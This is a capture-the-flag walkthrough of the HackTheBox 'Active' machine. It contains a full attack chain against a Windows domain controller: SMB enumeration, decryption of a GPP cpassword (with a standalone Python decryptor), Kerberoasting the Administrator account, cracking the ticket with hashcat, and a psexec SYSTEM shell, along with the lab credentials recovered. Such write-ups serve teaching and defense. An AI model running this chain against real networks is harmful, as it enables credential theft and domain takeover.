An easy Windows box from HackTheBox: find credentials inside an SMB share, use them to Kerberoast the Administrator account, crack the resulting TGS hash with hashcat and get a SYSTEM shell.

Recon

Running the usual nmap

georgy@pop-os:~/Documents/htb/active$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.100

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-10-06 00:54:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

The default scripts reveal the domain name, active.htb; add it to /etc/hosts.

Run an ldapsearch against the root DSE with an anonymous bind; it returns the naming contexts and not much else we don't already know:

georgy@pop-os:~/Documents/htb/active$ ldapsearch -H ldap://active.htb -x -s base

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
currentTime: 20221006010634.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=active,DC=htb
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb
defaultNamingContext: DC=active,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
configurationNamingContext: CN=Configuration,DC=active,DC=htb
...

Now try to enumerate further with rpcclient over a null session, but an empty username and password are refused:

georgy@pop-os:~/Documents/htb/active$ rpcclient -U '' -N 10.10.10.100
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

Moving on to trying SMB

georgy@pop-os:~/Documents/htb/active$ smbclient -L \\\\10.10.10.100
Password for [WORKGROUP\georgy]:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk 

Anonymous listing works, and Replication and Users are non-default shares worth a look.

Let's poke around with smbclient:

georgy@pop-os:~/Documents/htb/active$ smbclient \\\\10.10.10.100\\Replication

Inside are a few interesting files, notably Groups.xml, a Group Policy Preferences file that carries a username and an encrypted password:

Exploitation

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The username is in plaintext, SVC_TGS. The cpassword is not a hash: Group Policy Preferences encrypt it with AES-256 under a fixed key that Microsoft published in MSDN, so anyone who can read the file can decrypt it (MS14-025 stopped new passwords being written this way, but did not remove files that already existed). Looking around online for how to decrypt it turns up a tool called gpp-decrypt; the git repo runs into pycrypto dependency issues, so install it from the Kali repositories with "sudo apt install gpp-decrypt":

georgy@pop-os:~/Documents/htb/active$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18
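To see what gpp-decrypt is actually doing, here is an added example (my code, not from the writeup or from the gpp-decrypt project) that decrypts a cpassword in plain Python with no third-party modules: it implements the AES-256 inverse cipher from FIPS-197, runs it in CBC mode with the all-zero IV and the key Microsoft published in MS-GPPREF section 2.2.1.1.4, strips the PKCS#7 padding and decodes the UTF-16LE string, then parses the Groups.xml recovered above to pull out every userName/cpassword pair. The function and variable names are mine; the Groups.xml sample is the one from the Replication share.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in MSDN for the GPP cpassword attribute (see MS14-025).
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

def _xtime(a):
    # Multiply by x in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1.
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a

def _mul(a, b):
    # GF(2^8) multiplication by shift-and-add.
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r

def _build_sbox():
    # S-box: multiplicative inverse, then the FIPS-197 affine transform.
    sbox = []
    for x in range(256):
        inv = next((y for y in range(1, 256) if _mul(x, y) == 1), 0)
        s = inv
        for i in range(1, 5):
            s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox

SBOX = _build_sbox()
INV_SBOX = [SBOX.index(v) for v in range(256)]

def _round_keys(key):
    # FIPS-197 key expansion for AES-256: 8 key words grow to 60, i.e. 15 round keys.
    w = [list(key[4 * i:4 * i + 4]) for i in range(8)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # SubWord(RotWord(t)) ^ Rcon
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append([a ^ b for a, b in zip(w[i - 8], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]

def _inv_mix_columns(s):
    return [_mul(s[4 * c + r], 14) ^ _mul(s[4 * c + (r + 1) % 4], 11)
            ^ _mul(s[4 * c + (r + 2) % 4], 13) ^ _mul(s[4 * c + (r + 3) % 4], 9)
            for c in range(4) for r in range(4)]

def aes256_decrypt_block(key, block):
    # Inverse cipher, FIPS-197 section 5.3; the 16-byte state is indexed 4*column + row.
    rk = _round_keys(key)
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, -1, -1):
        s = [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]  # InvShiftRows
        s = [INV_SBOX[b] for b in s]  # InvSubBytes
        s = [b ^ k for b, k in zip(s, rk[rnd])]  # AddRoundKey
        if rnd:  # the final round (rnd == 0) has no InvMixColumns
            s = _inv_mix_columns(s)
    return bytes(s)

def gpp_decrypt(cpassword):
    """cpassword -> plaintext: restore the base64 padding GPP drops, AES-256-CBC with an
    all-zero IV under the public key, strip PKCS#7 padding, decode the UTF-16LE string."""
    ct = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    prev, pt = bytes(16), bytearray()
    for i in range(0, len(ct), 16):
        blk = ct[i:i + 16]
        pt += bytes(a ^ b for a, b in zip(aes256_decrypt_block(GPP_KEY, blk), prev))
        prev = blk
    return bytes(pt[:-pt[-1]]).decode("utf-16-le")

def gpp_creds(groups_xml):
    """(userName, password) for every Properties element that carries a cpassword."""
    root = ET.fromstring(groups_xml.encode())
    return [(p.get("userName"), gpp_decrypt(p.get("cpassword")))
            for p in root.iter("Properties") if p.get("cpassword")]

# Groups.xml exactly as pulled from the Replication share above.
GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

if __name__ == "__main__":
    for user, password in gpp_creds(GROUPS_XML):
        print(f"{user}:{password}")
```

The point to take away is that this is encryption under a public key, not hashing, so there is nothing to crack. Every authenticated domain user can read SYSVOL, so any cpassword that survives in a Group Policy Preferences XML (Groups.xml, but also Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml) is effectively plaintext to the whole domain.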

Now we have a user and a password; let's see if we can get a shell.

psexec doesn't work: SVC_TGS is not a local administrator, so none of the admin shares are writable and impacket has nowhere to upload its service binary:

georgy@pop-os:/opt/impacket/examples$ python3 psexec.py SVC_TGS@10.10.10.100

Password:
[*] Requesting shares on 10.10.10.100.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

evil-winrm doesn't work either unfortunately (5985 didn't show up in the scan).

So let's just try to Kerberoast. Any authenticated domain user can request a service ticket for any account that has an SPN, and that ticket is encrypted with the account's password hash, so it can be cracked offline. Administrator has an SPN here, and it works:

georgy@pop-os:/opt/impacket/examples$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -outputfile ~/Documents/htb/active/hash

georgy@pop-os:/opt/impacket/examples$ cat ~/Documents/htb/active/hash
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f599568423143bf9d81235362108d987$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

Now crack it with hashcat in mode 13100 (Kerberos 5 TGS-REP, etype 23, i.e. RC4-HMAC), and get a password:

georgy@pop-os:~/Documents/htb/active$ hashcat -m 13100 hash /opt/seclists/Passwords/Leaked-Databases/rockyou.txt

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f599568423143bf9d81235362108d987$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:Ticketmaster1968

That gives us the Administrator credentials:

Administrator:Ticketmaster1968
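Before pointing hashcat at a hash file it is worth checking what the $23$ in that line means. As an added example (my code, not from the writeup, impacket or hashcat), the following parses the hash lines GetUserSPNs writes, validates their layout, and maps the Kerberos etype to the hashcat mode that cracks it: 23 is RC4-HMAC (mode 13100, the fast case we hit here, where a guess costs one MD4 and one HMAC-MD5), while 17 and 18 are AES (modes 19600/19700, where every guess costs 4096 rounds of PBKDF2 first). The sample list reuses the Administrator line from above with its encrypted part replaced by a constructed placeholder, plus a constructed AES256 line for a made-up account, svc_sql, that does not exist on this box.

```python
import re

# hashcat modes for Kerberos 5 TGS-REP hashes, by Kerberos encryption type (hashcat --help).
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAME = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# impacket's GetUserSPNs writes RC4 and AES tickets in slightly different layouts:
#   $krb5tgs$23$*user$REALM$spn*$<16-byte HMAC-MD5 checksum>$<edata>
#   $krb5tgs$17$user$REALM$*spn*$<12-byte HMAC-SHA1-96 checksum>$<edata>   (18 likewise)
_RC4 = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$(?P<spn>[^$*]+)\*"
    r"\$(?P<checksum>[0-9a-f]{32})\$(?P<edata>(?:[0-9a-f]{2})+)$")
_AES = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$\*(?P<spn>[^$*]+)\*"
    r"\$(?P<checksum>[0-9a-f]{24})\$(?P<edata>(?:[0-9a-f]{2})+)$")

def parse_krb5tgs(line):
    """Split one TGS-REP hash line into its fields and add the hashcat mode that cracks it."""
    m = _RC4.match(line.strip()) or _AES.match(line.strip())
    if not m:
        raise ValueError("not a well-formed $krb5tgs$ line for etype 23, 17 or 18")
    f = m.groupdict()
    f["etype"] = int(f["etype"])
    f["etype_name"] = ETYPE_NAME[f["etype"]]
    f["hashcat_mode"] = HASHCAT_MODE[f["etype"]]
    return f

def hashcat_commands(lines, hashfile, wordlist):
    """One hashcat invocation per etype present: hashcat takes a single -m per run, so a
    file that mixes RC4 and AES tickets has to be cracked in separate passes."""
    modes = sorted({parse_krb5tgs(l)["hashcat_mode"] for l in lines if l.strip()})
    return [f"hashcat -m {m} {hashfile} {wordlist}" for m in modes]

# Sample input: the Administrator line from GetUserSPNs above with its encrypted part
# replaced by a constructed placeholder, plus a constructed AES256 line for a made-up
# account (svc_sql) that does not exist on this box.
SAMPLE_HASHES = [
    "$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*"
    "$f599568423143bf9d81235362108d987$" + "ab" * 32,
    "$krb5tgs$18$svc_sql$ACTIVE.HTB$*MSSQLSvc/dc.active.htb~1433*$" + "cd" * 12 + "$" + "ef" * 32,
]

if __name__ == "__main__":
    for h in SAMPLE_HASHES:
        f = parse_krb5tgs(h)
        print(f"{f['user']}@{f['realm']} spn={f['spn']} etype={f['etype']} "
              f"({f['etype_name']}) -> -m {f['hashcat_mode']}")
    print("\n".join(hashcat_commands(SAMPLE_HASHES, "hash", "rockyou.txt")))
```

The defensive corollary: a service account that has only AES keys enabled (msDS-SupportedEncryptionTypes without RC4) still gets Kerberoasted, but each guess is roughly three orders of magnitude more expensive, and a long random password makes the ticket useless to the attacker either way.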

Let's try psexec again with the Administrator credentials; this time ADMIN$ is writable, so impacket can drop its service binary and we land straight in a SYSTEM shell:

georgy@pop-os:/opt/impacket/examples$ python3 psexec.py Administrator@10.10.10.100
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ruxPYfYS.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service OKpc on 10.10.10.100.....
[*] Starting service OKpc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>